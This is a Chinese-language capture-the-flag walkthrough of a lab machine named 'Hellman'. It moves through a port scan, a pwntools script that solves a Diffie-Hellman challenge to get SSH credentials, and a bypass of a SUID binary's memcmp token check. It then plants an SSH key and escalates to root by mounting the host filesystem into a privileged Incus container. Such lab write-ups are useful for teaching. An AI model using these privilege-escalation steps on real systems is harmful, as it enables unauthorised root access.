信息收集

bash

1┌──(root㉿kali)-[~]2└─# arp-scan -l | grep PCS3192.168.31.109  08:00:27:11:9b:89       PCS Systemtechnik GmbH4 5┌──(root㉿kali)-[~]6└─# IP=192.168.31.1097

bash

1┌──(root㉿kali)-[~]2└─# nmap -sV -sC -A $IP -Pn3Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 03:57 EST4Nmap scan report for Hellman (192.168.31.109)5Host is up (0.0012s latency).6Not shown: 998 closed tcp ports (reset)7PORT   STATE SERVICE VERSION822/tcp open  ssh     OpenSSH 10.0 (protocol 2.0)980/tcp open  http    nginx10|_http-title: Diffie-Hellman Challenge Guide11MAC Address: 08:00:27:11:9B:89 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)12Device type: general purpose|router13Running: Linux 4.X|5.X, MikroTik RouterOS 7.X14OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.315OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)16Network Distance: 1 hop17 18TRACEROUTE19HOP RTT     ADDRESS201   1.20 ms Hellman (192.168.31.109)21 22OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .23Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds

访问发现是一道密码题，题目要求模拟 Diffie-Hellman 密钥交换协议的一方，连接服务器后得到以下参数：

公共参数: 一个大素数和生成元（固定为 2）
每轮变化: Alice 的公钥和我们要使用的私钥

数学原理

Diffie-Hellman 的核心机制如下：

Alice 生成私钥，计算公钥发送给我们
我们拥有私钥
我们需要计算共享密钥

根据 DH 协议定义，共享密钥的计算公式为

交互逻辑分析

观察发现服务器的交互流程如下：

服务器发送欢迎语并给出和
第一轮挑战服务器发送当前轮次的和
后续轮次如果发送正确的，服务器返回 Correct!，紧接着发送新一轮的和，且不再发送和

解题脚本

python

1from pwn import *2 3context.log_level = 'info'4 5p = remote('192.168.31.109', 1337)6rounds = 5007 8p.recvuntil(b'g = ')9g = int(p.recvline().strip())10 11p.recvuntil(b'p = ')12p_ = int(p.recvline().strip())13 14print(f"g={g}")15print(f"p ={p_}")16 17for _ in range(rounds):18    p.recvuntil(b'b = ')19    b = int(p.recvline().strip())20 21    p.recvuntil(b'A = ')22    A = int(p.recvline().strip())23 24    p.recvuntil(b'>')25 26    # Shared Secret27    S = pow(A, b, p_)28 29    p.sendline(str(S).encode())30 31p.interactive()

从输出中得到 676f643a6e756d626572735f6172655f68617264，十六进制转字符得到 god:numbers_are_hard

bash

1┌──(root㉿kali)-[~]2└─# ssh god@$IP                    3The authenticity of host '192.168.31.109 (192.168.31.109)' can't be established.4ED25519 key fingerprint is SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY.5This host key is known by the following other names/addresses:6    ~/.ssh/known_hosts:10: [hashed name]7    ~/.ssh/known_hosts:13: [hashed name]8Are you sure you want to continue connecting (yes/no/[fingerprint])? yes9Warning: Permanently added '192.168.31.109' (ED25519) to the list of known hosts.10god@192.168.31.109's password: numbers_are_hard11              _                          12__      _____| | ___ ___  _ __ ___   ___ 13\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \14 \ V  V /  __/ | (_| (_) | | | | | |  __/15  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|16                                         17Hellman:~$ id18uid=1001(god) gid=1001(god) groups=1001(god)19Hellman:~$ ls -ah20.             ..            .ash_history  user.txt21Hellman:~$ cat user.txt22flag{user-c9461249ea2e074a338b82db919b3fb9}

横向移动

bash

1Hellman:~$ find / -perm -u=s -type f 2>/dev/null2/bin/bbsuid3/usr/libexec/dbus-daemon-launch-helper4/usr/bin/expiry5/usr/bin/chsh6/usr/bin/secure_auth7/usr/bin/chage8/usr/bin/passwd9/usr/bin/gpasswd10/usr/bin/chfn

/usr/bin/secure_auth 不太对劲，拖出来逆一下

1int __fastcall main(int argc, const char **argv, const char **envp)2{3  size_t n; // rdx4  char *s; // [rsp+10h] [rbp-120h]5  const char *s1; // [rsp+18h] [rbp-118h]6  _BYTE s2[264]; // [rsp+20h] [rbp-110h] BYREF7  unsigned __int64 v8; // [rsp+128h] [rbp-8h]8 9  v8 = __readfsqword(0x28u);10  if ( argc > 2 )11  {12    s = (char *)argv[1];13    s1 = argv[2];14    xor_cipher(15      s,16      key,                                      // "4b077130fw473r"17      s2);18    n = strlen(s);19    if ( !memcmp(s1, s2, n) )20    {21      puts("[+] Auth successful. Switching to UID 1002...");22      if ( setresgid(0x3EAu, 0x3EAu, 0x3EAu) )23        perror("setresgid failed");24      if ( setresuid(0x3EAu, 0x3EAu, 0x3EAu) )25        perror("setresuid failed");26      system(s);27    }28    else29    {30      puts("[-] Auth failed.");31    }32    return 0;33  }34  else35  {36    printf("Usage: %s <command> <token>\n", *argv);37    return 1;38  }39}

程序逻辑如下：

输入：接收参数 <command> 和 <token>
加密：程序内有一个硬编码的密钥 key = "4b077130fw473r"，程序将 <command> 与 key 异或的结果存入 s2
验证：比较 <token> 与计算出的 s2 是否一致
执行：如果一致就将当前用户的 UID/GID 设置为 1002，然后执行 <command>

s (0x73) XOR 4 (0x34) = G

h (0x68) XOR b (0x62) = \n

所以正确的 Token 应该是 G\n

可以用 $() 来执行命令并将结果作为参数传递，但是 Linux 的命令替换 $() 默认会删除输出结果末尾的换行符，进而导致比较失败

回头看程序的验证逻辑：

1n = strlen(s);              // 这里的 s 是 "sh"，所以 n = 22if ( !memcmp(s1, s2, n) )   // s1 是输入的 Token，s2 是计算得到的 Token

关键点在于第三个参数 n，memcmp 并不是比较两个字符串是否完全相等，而是比较前 n 个字节是否相等

只要输入的 Token 的前 2 个字节是 G 和 \n 即可通过验证，后面的字节不参与比较，所以在 \n 后面再加任意一个字符即可

bash

1Hellman:~$ /usr/bin/secure_auth sh "$(printf 'G\nx')"2[+] Auth successful. Switching to UID 1002...3~ $ id4uid=1002(water) gid=1002(water) groups=1001(god)

提权

检查 water 的历史记录

bash

1~ $ cd /home/water2/home/water $ ls -al3total 124drwxr-sr-x    2 water    water         4096 Jan 23 15:46 .5drwxr-xr-x    4 root     root          4096 Jan 23 15:45 ..6-rw-------    1 water    water           63 Jan 23 15:47 .ash_history7/home/water $ cat .ash_history8incus9ls -l /var/lib/incus/unix.socket10addgroup god incus11exit

Incus 是 LXD 的一个社区分支，它是一个系统容器管理器
如果能访问 Incus/LXD 的 Socket 就意味着可以把宿主机的根目录 / 挂载到容器里，从而以 root 权限读写宿主机的任何文件
先确认是否有权限操作 Incus，看看谁有权限读写这个 socket 文件：

bash

1/home/water $ ls -l /var/lib/incus/unix.socket2srw-rw----    1 root     incus            0 Jan 23 16:52 /var/lib/incus/unix.socket

发现对 incus 组可写，然后检查 incus 的组成员

bash

1/home/water $ grep incus /etc/group2incus:x:106:water3incus-user:x:107:4incus-admin:x:108:

发现 water 在里面，在 kali 生成一对密钥

bash

1┌──(root㉿kali)-[~]2└─# ssh-keygen -t rsa -f water_key3Generating public/private rsa key pair.4Enter passphrase for "water_key" (empty for no passphrase): 5Enter same passphrase again: 6Your identification has been saved in water_key7Your public key has been saved in water_key.pub8The key fingerprint is:9SHA256:GTh7pSNVcigvB6HQP/txQTibanRsngzJkvI6vfjjTSo root@kali10The key's randomart image is:11+---[RSA 3072]----+12|  ..  ...oo      |13|   ...o.++.      |14|    .+o*o=.      |15|  . o O+O=.      |16|   o oo%S. .     |17|    . +o=..      |18|   o ... o       |19|  E.o+  .        |20|  .==o.          |21+----[SHA256]-----+22 23┌──(root㉿kali)-[~]24└─# cat water_key.pub25ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCsrbkrGLaPyxh8IrbFGmS4SYXnemawNEKUX0w9+aWOFRE25KX15DAzzajGwMylaVIMuEsJuSwSRCB6h8S/4Fyk58ebDDIQJDjefA59b/DEYXJhPrE+8LEqGEm1249/epPkSF6FQTYwnyESzUGkwkEcmSJFE5pIUrR+YsVGGQh5hByLPzSmwU33lRu6khwlvpZ5bHMAoCUjf6YTHE6kHl+XYYBWSPjUtGT+CpHFuX3sUVMGIpA0543OQS7FxJ8F74fAcgGjjFMrtJF1yo26adSGUIADvbyMG2ZCpClFlFyocXu+tlydjmzXyyZj+eugHkEV/RHKXGQmSVG1inG+kzA3NFxy/emWI2kWenpYRuEMHQZRDe6siYlkVPBzqOMe2HDHTF1C1W206V2XOUxrhh/P67yVpzDo+CSU1MN7+oP5sFpwtQvyRr9Mi6cvT9BvExbjtRawkQsabCJ6M1KK3/JG8aXhqsK+kklwQJTQFNo2o2FqRd/6Ok1rRKY+MAaGTyk= root@kali

回到靶机

bash

1/home/water $ mkdir -p ./.ssh2/home/water $ chmod 700 ./.ssh3/home/water $ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCsrbkrGLaPyxh8IrbFGmS4SYXnemawNEKUX0w9+aWOFRE25KX15DAzzajGwMylaVIM4uEsJuSwSRCB6h8S/4Fyk58ebDDIQJDjefA59b/DEYXJhPrE+8LEqGEm1249/epPkSF6FQTYwnyESzUGkwkEcmSJFE5pIUrR+YsVGGQh5hByLPzSmwU33lRu6khwl5vpZ5bHMAoCUjf6YTHE6kHl+XYYBWSPjUtGT+CpHFuX3sUVMGIpA0543OQS7FxJ8F74fAcgGjjFMrtJF1yo26adSGUIADvbyMG2ZCpClFlFyocXu+tlydjmzXyyZj6+eugHkEV/RHKXGQmSVG1inG+kzA3NFxy/emWI2kWenpYRuEMHQZRDe6siYlkVPBzqOMe2HDHTF1C1W206V2XOUxrhh/P67yVpzDo+CSU1MN7+oP5sFpwtQvyRr9M7i6cvT9BvExbjtRawkQsabCJ6M1KK3/JG8aXhqsK+kklwQJTQFNo2o2FqRd/6Ok1rRKY+MAaGTyk= root@kali" > /home/water/.ssh/authorized_keys8/home/water $ chmod 600 ./.ssh/authorized_keys

SSH 登录

bash

1┌──(root㉿kali)-[~]2└─# ssh -i water_key water@$IP3              _                          4__      _____| | ___ ___  _ __ ___   ___ 5\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \6 \ V  V /  __/ | (_| (_) | | | | | |  __/7  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|8                                         9Hellman:~$ id10uid=1002(water) gid=1002(water) groups=106(incus),1002(water)

看看本地有什么镜像

bash

1Hellman:~$ incus image list2+-------+--------------+--------+------------------------------------+--------------+-----------+---------+----------------------+3| ALIAS | FINGERPRINT  | PUBLIC |            DESCRIPTION             | ARCHITECTURE |   TYPE    |  SIZE   |     UPLOAD DATE      |4+-------+--------------+--------+------------------------------------+--------------+-----------+---------+----------------------+5|       | 56a897afdceb | no     | Alpine edge amd64 (20260120_13:00) | x86_64       | CONTAINER | 3.27MiB | 2026/01/23 15:48 CST |6+-------+--------------+--------+------------------------------------+--------------+-----------+---------+----------------------+

提权

bash

1Hellman:~$ incus init images:alpine/edge pwn -c security.privileged=true2Creating pwn3Hellman:~$ incus config device add pwn mydevice disk source=/ path=/mnt/root recursive=true4Device mydevice added to pwn5Hellman:~$ incus start pwn6Hellman:~$ incus exec pwn /bin/sh7~ # id8uid=0(root) gid=0(root)

经过 Sublarge 提醒要进挂载目录

bash

1~ # cd /mnt/root/root2/mnt/root/root # ls3root.txt4/mnt/root/root # cat root.txt5flag{root-da3397afd8ca24ea5bcaf7a2cb83b422}